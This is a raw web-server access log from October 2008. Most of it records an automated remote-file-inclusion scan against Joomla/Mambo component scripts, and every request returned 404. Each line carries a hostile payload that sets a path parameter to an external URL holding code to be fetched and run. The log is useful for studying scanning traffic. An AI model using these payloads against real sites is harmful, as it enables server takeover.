161.58.192.164 - - [23/Oct/2008:09:13:43 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://vcd.co.uk//includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:43 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:43 -0700] "GET /logs/access_080530.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:43 -0700] "GET /logs/access_080603.log%20%20//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:43 -0700] "GET /logs//components/com_jcs/jcs.function.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:43 -0700] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:43 -0700] "GET /logs/access_080530.log//administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:43 -0700] "GET /logs/access_080606.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:43 -0700] "GET /logs/access_080606.log//administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:43 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:43 -0700] "GET /logs/access_080530.log//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:43 -0700] "GET /logs/access_080606.log%20%20//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:43 -0700] "GET /logs/access_080530.log%20%20//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:43 -0700] "GET /logs/access_080606.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:43 -0700] "GET /logs/access_080530.log%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:43 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:44 -0700] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:44 -0700] "GET /logs/access_080530.log//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:44 -0700] "GET /logs/access_080603.log%20%20//components/com_jombib/BibTex.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:44 -0700] "GET /logs//components/com_jcs/jcs.function.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:44 -0700] "GET /logs//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:44 -0700] "GET /logs/access_080530.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:44 -0700] "GET /logs/access_080606.log//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:44 -0700] "GET /logs/access_080606.log//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:44 -0700] "GET /logs/access_080530.log//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:44 -0700] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:44 -0700] "GET /logs/access_080606.log%20%20//components/com_jombib/BibTex.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:44 -0700] "GET /logs/access_080530.log%20%20//components/com_jombib/BibTex.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:44 -0700] "GET /logs/access_080606.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:44 -0700] "GET /logs/access_080530.log%20%20//components/com_jcs/jcs.function.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:44 -0700] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:44 -0700] "GET /logs//components/com_jcs/jcs.function.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:44 -0700] "GET /logs/access_080530.log//components/com_mambowiki/MamboLogin.php?IP=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:44 -0700] "GET /logs//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:44 -0700] "GET /logs//components/com_jombib/BibTex.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:44 -0700] "GET /logs/access_080603.log%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:44 -0700] "GET /logs/access_080606.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:44 -0700] "GET /logs/access_080606.log//components/com_mambowiki/MamboLogin.php?IP=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:44 -0700] "GET /logs/access_080530.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:44 -0700] "GET /logs/access_080606.log%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:44 -0700] "GET /logs/access_080530.log%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:44 -0700] "GET /logs//administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:44 -0700] "GET /logs/access_080530.log%20%20//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:44 -0700] "GET /logs/access_080606.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:44 -0700] "GET /logs/access_080530.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:44 -0700] "GET /logs//administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:44 -0700] "GET /logs//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:44 -0700] "GET /logs/access_080530.log//components/com_minibb.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:44 -0700] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:44 -0700] "GET /logs/access_080603.log%20%20//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:44 -0700] "GET /logs//components/com_jombib/BibTex.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:44 -0700] "GET /logs/access_080606.log//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:44 -0700] "GET /logs/access_080606.log//components/com_minibb.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:44 -0700] "GET /logs/access_080530.log//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:44 -0700] "GET /logs/access_080606.log%20%20//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:45 -0700] "GET /logs/access_080530.log%20%20//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:45 -0700] "GET /logs//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:45 -0700] "GET /logs/access_080530.log%20%20//components/com_jombib/BibTex.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:45 -0700] "GET /logs/access_080606.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:45 -0700] "GET /logs/access_080530.log//components/com_moodle/moodle.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:45 -0700] "GET /logs/access_080530.log//administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:45 -0700] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:45 -0700] "GET /logs/access_080603.log%20%20//components/com_mambowiki/MamboLogin.php?IP=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:45 -0700] "GET /logs/access_080606.log//components/com_moodle/moodle.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:45 -0700] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:45 -0700] "GET /logs/access_080606.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:45 -0700] "GET /logs//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:45 -0700] "GET /logs//components/com_jombib/BibTex.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:45 -0700] "GET /logs/access_080530.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:45 -0700] "GET /logs/access_080606.log%20%20//components/com_mambowiki/MamboLogin.php?IP=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:45 -0700] "GET /logs/access_080530.log%20%20//components/com_mambowiki/MamboLogin.php?IP=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:45 -0700] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:45 -0700] "GET /logs/access_080530.log%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:45 -0700] "GET /logs/access_080606.log//administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:45 -0700] "GET /logs/access_080530.log//components/com_mosmedia/media.divs.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:45 -0700] "GET /logs/access_080530.log//administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:45 -0700] "GET /logs//components/com_mambowiki/MamboLogin.php?IP=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:45 -0700] "GET /logs/access_080606.log//components/com_mosmedia/media.divs.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:45 -0700] "GET /logs/access_080603.log%20%20//components/com_minibb.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:45 -0700] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:45 -0700] "GET /logs/access_080606.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:45 -0700] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:45 -0700] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:45 -0700] "GET /logs/access_080530.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:45 -0700] "GET /logs/access_080606.log%20%20//components/com_minibb.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:45 -0700] "GET /logs/access_080530.log%20%20//components/com_minibb.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:45 -0700] "GET /logs/access_080530.log%20%20//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:45 -0700] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:45 -0700] "GET /logs/access_080606.log//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:46 -0700] "GET /logs/access_080530.log//components/com_mosmedia/media.tab.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:46 -0700] "GET /logs/access_080530.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:46 -0700] "GET /logs//components/com_minibb.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:46 -0700] "GET /logs/access_080606.log//components/com_mosmedia/media.tab.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:46 -0700] "GET /logs/access_080606.log//administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:46 -0700] "GET /logs//components/com_mambowiki/MamboLogin.php?IP=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:46 -0700] "GET /logs/access_080530.log//administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:46 -0700] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:46 -0700] "GET /logs/access_080603.log%20%20//components/com_moodle/moodle.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:46 -0700] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:46 -0700] "GET /logs/access_080606.log%20%20//components/com_moodle/moodle.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:46 -0700] "GET /logs/access_080530.log%20%20//components/com_moodle/moodle.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:46 -0700] "GET /logs/access_080530.log%20%20//components/com_mambowiki/MamboLogin.php?IP=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:46 -0700] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:46 -0700] "GET /logs/access_080606.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:46 -0700] "GET /logs/access_080530.log//components/com_mospray/scripts/admin.php?basedir=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
